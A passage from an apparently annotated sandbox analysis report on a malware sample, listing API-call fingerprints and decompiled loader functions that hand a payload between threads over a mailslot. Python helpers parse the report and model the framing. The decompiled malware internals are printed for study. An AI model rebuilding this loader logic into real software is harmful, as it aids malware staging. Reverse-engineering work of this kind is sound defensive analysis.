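Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\\\.\\mailslot\\msl0
APIs
  • CreateMailslotA.KERNEL32(\\\\.\\mailslot\\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
"""

KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s?(?P<value>.*)$")
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                    # call-site address as printed in the report
    subcall_of: Optional[str]   # callee whose internals this call belongs to, else None


@dataclass
class FunctionBlock:
    fields: dict[str, str] = field(default_factory=dict)   # the 'Similarity' key/values
    apis: list[ApiCall] = field(default_factory=list)      # direct and subcall entries, in order
    source: dict[str, str] = field(default_factory=dict)   # parsed 'Source File' footer line

    @property
    def string_id(self) -> str:
        return self.fields.get("String ID", "")

    def api_sequence(self) -> list[str]:
        """This function's own calls in listing order, subcalls excluded."""
        return [c.name for c in self.apis if c.subcall_of is None]


def parse(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Similarity":
            blocks.append(FunctionBlock())
            section = "similarity"
            continue
        if not blocks:                      # text before the first block
            continue
        if line in ("APIs", "Strings", "Memory Dump Source") or line.startswith("C-Code"):
            section = line.split(" ")[0].lower()   # apis / strings / memory / c-code
            continue
        blk = blocks[-1]
        m = API_RE.match(raw)
        if section == "apis" and m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            blk.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = KV_RE.match(raw)
        if not m or section not in ("similarity", "memory"):
            continue                        # C listing, spilled gutter addresses, empty 'Strings'
        if section == "similarity":
            blk.fields[m["key"]] = m["value"]
        else:                               # 'Source File: X, Offset: Y, based on PE: Z'
            for seg in f"{m['key']}: {m['value']}".split(", "):
                k, v = seg.split(": ", 1)
                blk.source[k] = v
    return blocks


def blocks_calling(blocks: list[FunctionBlock], api: str) -> list[FunctionBlock]:
    """Blocks that reach `api` directly or through one of their listed subcalls."""
    return [b for b in blocks if any(c.name == api for c in b.apis)]


if __name__ == "__main__":
    for b in parse(SAMPLE):
        print(f"{b.fields['Total matches']:>4} matches  {b.string_id!r:<22}  {' > '.join(b.api_sequence())}")
```

The `$` inside an API ID (for example `GetLastError$CloseHandle...`) is kept verbatim because the report does not define it. `blocks_calling` deliberately searches subcall entries too, so the `cmd /C "%s> %s1"` block is returned for `CreateProcessA` even though that call sits inside 001C7422 rather than in the block's own code.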

General

Root Process Name:d3d8sext.exe
Process MD5:3067FCCA87759E8F70DE41B4B5C179D9
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:63270
Initial sample SHA 256:FFB9190514D3491BC79F13EF817E2D34E10E9A04ADF62ACE135FBED3EAFC4CE1
Initial sample name:Inquiry.doc

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			// Driver for the mailslot hand-off: thread 1 (E00401034, one byte past the
			// pop that opens E00401033) creates \\.\mailslot\msl0 and reads from it,
			// thread 2 (E004010FB) opens the slot and writes to it. Both threads get the
			// same stack block (_v28). Returns the first failing thread's exit code, or
			// otherwise the result of E00401593 on the received buffer.
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;      // heap handle; E00401033 passes it to HeapReAlloc
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed   ("pnls" as stored in memory)
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed   reader thread
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed   writer thread
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed   wait for the writer first
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);            // writer failed: kill the reader, return its error
						} else {
							WaitForSingleObject(_v8, 0xffffffff); // then wait for the reader
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed   both done: consume the buffer (VirtualAlloc inside)
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

Statement addresses (listing order): 0x00401647, 0x0040164f, 0x00401664, 0x0040166e, 0x00401672, 0x00401675, 0x00401713, 0x0040167b, 0x0040168c, 0x0040168e, 0x00401692, 0x00401695, 0x004016fe, 0x00401697, 0x004016a0, 0x004016a3, 0x004016b4, 0x004016e7, 0x004016bb, 0x004016c0, 0x004016cd, 0x004016d7, 0x004016dc, 0x004016dc, 0x004016cd, 0x004016f0, 0x004016f0, 0x00401704, 0x0040170a, 0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			// Writer half of the hand-off: opens \\.\mailslot\msl0 for writing
			// (GENERIC_WRITE, share read+write, OPEN_EXISTING), retrying every 100 ms
			// while the slot does not exist yet (error 2, ERROR_FILE_NOT_FOUND), then
			// sends the buffer built by E0040171F in messages of at most 0x1000 bytes,
			// 100 ms apart, and wipes and frees the buffer afterwards.
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;                                  // send offset
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);                      // poll until the reader thread has created the slot
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed   builds the payload: _a4 = buffer, _v24 = length
				if(_t34 == 0) {
					_v12 = 0xb;                           // ERROR_BAD_FORMAT
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;                              // bytes left to send
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;                    // one message is at most the slot's max message size
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {                // only ERROR_SEM_TIMEOUT is retried after the Sleep
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;              // payload ended on a full chunk: re-send the last byte as a
							_v8 = _v8 - 1;                // 1-byte message so the reader's "last read was 0x1000" loop ends
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);                     // wipe the sent payload, then free it (E00401207 -> HeapFree)
				E00401207(_t52);
				goto L18;
			}

Statement addresses (listing order): 0x004010fb, 0x004010fb, 0x00401104, 0x00401107, 0x00401118, 0x00401121, 0x00401124, 0x00401139, 0x00401126, 0x0040112e, 0x00401131, 0x00401131, 0x0040113c, 0x00401145, 0x004011ea, 0x004011ef, 0x004011ef, 0x00401158, 0x0040115f, 0x004011da, 0x004011e1, 0x004011e4, 0x00000000, 0x004011e4, 0x00401161, 0x00401164, 0x00401165, 0x00401168, 0x0040116e, 0x00401170, 0x00401173, 0x00401175, 0x00401175, 0x0040118a, 0x00401192, 0x004011a8, 0x004011b1, 0x004011b4, 0x00000000, 0x00000000, 0x00401194, 0x00401194, 0x00401197, 0x0040119a, 0x0040119c, 0x004011a2, 0x004011a3, 0x004011a3, 0x0040119c, 0x004011b8, 0x004011be, 0x004011c8, 0x004011d1, 0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			// Reader half: creates \\.\mailslot\msl0 with a 0x1000-byte message limit
			// and a zero read timeout, then polls it, appending each message to a heap
			// buffer grown by 0x1000 per read. The loop ends after the first message
			// shorter than 0x1000 bytes; an empty slot (ERROR_SEM_TIMEOUT, 0x79) means
			// sleep 100 ms and read again. On success the buffer pointer and byte count
			// are stored at _a4+4 and _a4+8 for E00401639/E00401593. The decompiler
			// keeps the slot handle in _v16 but reads and closes _v20; both are the handle.
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;                                 // bytes received so far
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);             // RtlAllocateHeap(0x1000): initial buffer
					if(_t36 == 0) {
						L10:
						_v8 = 8;                          // ERROR_NOT_ENOUGH_MEMORY
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;        // nothing in the slot yet: fake a full read so the loop continues
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed   grow for the next message
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000; // clear the error code
									goto L8;
								}
							}
							goto L11;                     // ReadFile failed with any other error: stop
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);         // a short message ends the transfer
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;                  // received buffer
					 *((intOrPtr*)(_t27 + 8)) = _t39;     // received length
				}
				return _v8;
			}

Statement addresses (listing order): 0x00401033, 0x0040103d, 0x0040104c, 0x0040104f, 0x00401057, 0x0040105a, 0x004010d6, 0x004010dc, 0x004010df, 0x0040105c, 0x00401062, 0x00401066, 0x004010c4, 0x004010c4, 0x00401068, 0x00401068, 0x00401076, 0x0040107e, 0x004010a4, 0x004010ad, 0x004010b0, 0x004010b2, 0x00000000, 0x004010b2, 0x00401080, 0x00401080, 0x00401086, 0x00401092, 0x00401098, 0x0040109c, 0x00000000, 0x0040109e, 0x0040109e, 0x00000000, 0x0040109e, 0x0040109c, 0x00000000, 0x004010b5, 0x004010b7, 0x004010bd, 0x004010c2, 0x004010cb, 0x004010ce, 0x004010ce, 0x004010e6, 0x004010e8, 0x004010eb, 0x004010ee, 0x004010ee, 0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
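The three listings above (E00401639, E004010FB, E00401033) are one mechanism: a reader thread creates `\\.\mailslot\msl0` and a writer thread feeds it a buffer in messages of at most 0x1000 bytes, the reader stopping after the first short message. Two details are easy to miss in the decompiled loops. First, the reader treats ERROR_SEM_TIMEOUT (0x79, an empty slot read with a zero timeout) as "sleep 100 ms and read again", so it simply waits for the writer. Second, a payload whose length is a whole number of 0x1000-byte chunks would never produce a short message, so the writer re-sends its final byte as a one-byte terminator, which leaves the reader holding one duplicated byte at the end of the buffer. The Python below is an added example for this page, not the sample's code: it reproduces only that framing logic, with an in-memory message list standing in for the mailslot so it runs on any OS, and `max_polls` is a simulation bound the real reader does not have.

```python
"""Model of the chunked mailslot hand-off decompiled above (E00401033 reads
\\.\mailslot\msl0, E004010FB writes to it).

Added example for this page, not the sample's code. A list of messages replaces the
mailslot; CHUNK, the reader's "keep reading while the last message was a full chunk"
rule, the reader's retry on ERROR_SEM_TIMEOUT and the writer's re-send of the final
byte are taken from the decompiled loops. `max_polls` is a simulation-only bound."""
from collections import deque
from typing import Iterable

CHUNK = 0x1000            # CreateMailslotA max message size and ReadFile length above
ERROR_SEM_TIMEOUT = 0x79  # what ReadFile/WriteFile report when the slot is empty/unready


def writer_messages(payload: bytes) -> list[bytes]:
    """Split `payload` the way the second do/while in E004010FB does.

    Each WriteFile sends min(remaining, CHUNK) bytes. When the payload ends on a full
    chunk the writer does `_t46 += 1; _v8 -= 1`, i.e. it sends the last byte again as
    a 1-byte message so that the reader sees a short message and stops."""
    msgs: list[bytes] = []
    off, remaining = 0, len(payload)
    while True:                          # do { ... } while (_t46 != 0)
        n = min(remaining, CHUNK)
        msgs.append(payload[off:off + n])
        off += n
        remaining -= n
        if remaining == 0 and n == CHUNK:
            remaining, off = 1, off - 1  # terminator: re-send the final byte
        if remaining == 0:
            break
    return msgs


def reader_receive(slot: Iterable[bytes], max_polls: int = 100) -> bytes:
    """Reassemble as E00401033 does: append every message to a growing buffer and stop
    after the first one shorter than CHUNK. An empty slot is ERROR_SEM_TIMEOUT: the
    real loop sleeps 100 ms and polls again without limit; here it gives up after
    `max_polls` empty reads so the simulation cannot hang."""
    pending = deque(slot)
    buf = bytearray()
    polls = 0
    while True:
        if not pending:
            polls += 1                   # GetLastError() == ERROR_SEM_TIMEOUT -> Sleep(100), retry
            if polls > max_polls:
                raise TimeoutError(f"no message after {max_polls} polls (error {ERROR_SEM_TIMEOUT:#x})")
            continue
        msg = pending.popleft()
        buf += msg                       # HeapReAlloc grows the buffer by CHUNK per read
        if len(msg) != CHUNK:
            return bytes(buf)


def transfer(payload: bytes) -> tuple[list[bytes], bytes]:
    """Run both halves back to back; returns (messages on the wire, bytes received)."""
    msgs = writer_messages(payload)
    return msgs, reader_receive(msgs)


if __name__ == "__main__":
    for size in (3, 5000, CHUNK, 2 * CHUNK):
        payload = (bytes(range(256)) * (size // 256 + 1))[:size]
        msgs, got = transfer(payload)
        print(f"{size:5d} bytes -> {[len(m) for m in msgs]} on the wire, {len(got)} received,"
              f" intact={got[:size] == payload}, extra={got[size:]!r}")
```

For 5000 bytes the wire carries 4096 + 904 bytes and the reader gets exactly the payload; for 4096 bytes it carries 4096 + 1 and the reader ends with 4097 bytes whose last byte is a repeat, which is the behaviour to expect when dumping the received buffer from a live sample rather than a defect in the model.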
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
